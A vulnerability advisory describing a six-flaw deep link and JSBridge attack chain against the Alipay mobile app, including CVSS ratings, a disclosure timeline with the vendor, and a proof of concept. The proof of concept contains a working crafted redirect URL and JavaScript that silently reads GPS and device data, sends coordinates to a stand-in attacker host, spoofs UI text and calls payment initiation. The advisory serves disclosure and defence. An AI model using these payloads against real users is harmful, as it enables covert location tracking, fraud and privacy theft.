# Alipay Mobile App - DeepLink+JSBridge Unauthorized API Access Chain
# CVE Pending (MITRE Ticket #2005801)
# 6 Vulnerabilities, CVSS 7.4–9.3
## Advisory Information
Title: Alipay DeepLink+JSBridge Attack Chain — Silent GPS Exfiltration & Unauthorized API Access
Researcher: Jiqiang Feng (Innora AI Security Research)
Vendor: Ant Group / Alibaba Group
Product: Alipay (支付宝) v10.8.30.x (Android & iOS)
Users Affected: 1 billion+
Risk: Critical (CVSS 9.3)
CVE: 6 IDs pending (MITRE Ticket #2005801)
Vendor Response: "Normal functionality" — refused to patch
Disclosure Timeline: Responsible disclosure Feb 25 → Public Mar 11, 2026
## Summary
A single crafted URL enables a complete attack chain against Alipay mobile app users:
crafted link → open redirect via trusted domain (ds.alipay.com) → Alipay deep link handler → attacker page loads in privileged WebView → JSBridge APIs silently exfiltrate GPS, device data, and can initiate payment flows — all without user consent or visible prompt.
## Vulnerability Details
### Vuln 1: Open Redirect Whitelist Bypass (CWE-601 + CWE-939, CVSS 9.3)
ds.alipay.com accepts a "scheme" parameter that redirects to arbitrary alipays:// URLs.
Since ds.alipay.com is whitelisted, this bypasses all URL validation in the Alipay client.
Attack URL:
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=[ATTACKER_URL]
### Vuln 2: Silent GPS Exfiltration (CWE-359, CVSS 7.4)
AlipayJSBridge.call('getLocation') returns GPS coordinates (8.8m accuracy) silently.
No user prompt, no consent dialog, completes in 7 seconds.
### Vuln 3: Unauthorized Payment Initiation (CWE-940, CVSS 8.6) [iOS only]
AlipayJSBridge.call('tradePay') can pre-fill and present payment screens.
Combined with "small amount password-free payment" feature, may enable zero-interaction payment.
### Vuln 4: UI Spoofing (CWE-451, CVSS 8.1)
AlipayJSBridge.call('showToast') and AlipayJSBridge.call('setTitle') allow attackers
to display fake system notifications and modify the WebView title bar.
### Vuln 5: Device Fingerprinting (CWE-200, CVSS 8.6)
AlipayJSBridge.call('getSystemInfo'), getNetworkType, getCameraPermission,
getMicrophonePermission expose device model, OS, carrier, sensor permissions.
### Vuln 6: DeepLink URL Scheme Handler Bypass (CWE-939, CVSS 9.1)
The alipays:// scheme handler loads external URLs in privileged WebView context
without proper origin validation, granting full JSBridge API access.
## Exploitable JSBridge APIs (Verified)
| API | Data Extracted | Android | iOS |
|-------------------|-----------------------------------|---------|-----|
| getLocation | GPS coords (8.8m accuracy) | Yes | Yes |
| getNetworkType | WiFi/cellular, carrier info | Yes | Yes |
| getSystemInfo | Device model, OS, screen | Yes | Yes |
| tradePay | Pre-fill payment screen | No | Yes |
| share | Trigger share dialog | No | Yes |
| scan | Activate QR scanner | No | Yes |
| chooseImage | Access photo picker | No | Yes |
| setTitle | Modify WebView title (UI spoof) | Yes | Yes |
| showToast | Fake system notifications | Yes | Yes |
## Proof of Concept
### Step 1: Trigger URL (distribute via SMS/email/QR)
https://ds.alipay.com/?scheme=alipays://platformapi/startapp?appId=20000067&url=https%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fverify.html
### Step 2: JSBridge exploitation code (runs inside Alipay WebView)
```javascript
// Wait for bridge
document.addEventListener('AlipayJSBridgeReady', function() {
  // Silent GPS exfiltration
  AlipayJSBridge.call('getLocation', {}, function(result) {
    // result.latitude, result.longitude — 8.8m accuracy
    // Exfiltrate to attacker server
    fetch('https://attacker.com/collect', {
      method: 'POST',
      body: JSON.stringify({
        lat: result.latitude,
        lng: result.longitude,
        city: result.city
      })
    });
  });
  // Device fingerprinting
  AlipayJSBridge.call('getSystemInfo', {}, function(info) {
    // info.brand, info.model, info.system, info.version
  });
  // UI spoofing
  AlipayJSBridge.call('setTitle', {title: 'Alipay Security Center'});
  AlipayJSBridge.call('showToast', {content: 'Verification successful'});
  // iOS only: payment initiation
  AlipayJSBridge.call('tradePay', {tradeNO: 'ATTACKER_ORDER'});
});
```
## Verification Evidence
- 3 test devices: Samsung S25 Ultra (NZ), Xiaomi Redmi 12 (MY), iPhone 16 Pro (CN)
- 308 server-side GPS exfiltration logs with real coordinates
- 42 verification screenshots
- Vendor's security lead tested on iPhone from Hangzhou (Alipay HQ) — GPS captured silently in 7s
- iOS exposes 5 additional critical APIs vs Android
## Disclosure Timeline
2026-02-25 Initial TLS/SSL report to vendor
2026-03-06 Vendor: "cannot be practically exploited"
2026-03-07 Expanded report: 17 vulns with full end-to-end proof
2026-03-07 Whitelist bypass achieved in 2 minutes during live call with vendor's security lead
2026-03-08 Vendor security lead's own iPhone tested — GPS captured
2026-03-10 Vendor final response: "normal functionality"
2026-03-11 Public disclosure
2026-03-11 Vendor's law firm files takedown complaint (4 hours after publication)
2026-03-12 6 CVEs submitted to MITRE CNA-LR (Ticket #2005801)
## References
Technical Report: https://innora.ai/zfb/
PoC Demo Page: https://innora.ai/zfb/poc/trigger.html
Rebuttal to Legal Complaint: https://innora.ai/zfb/rebuttal.html
## Credits
Jiqiang Feng — Innora AI Security Research
[email protected] | https://innora.ai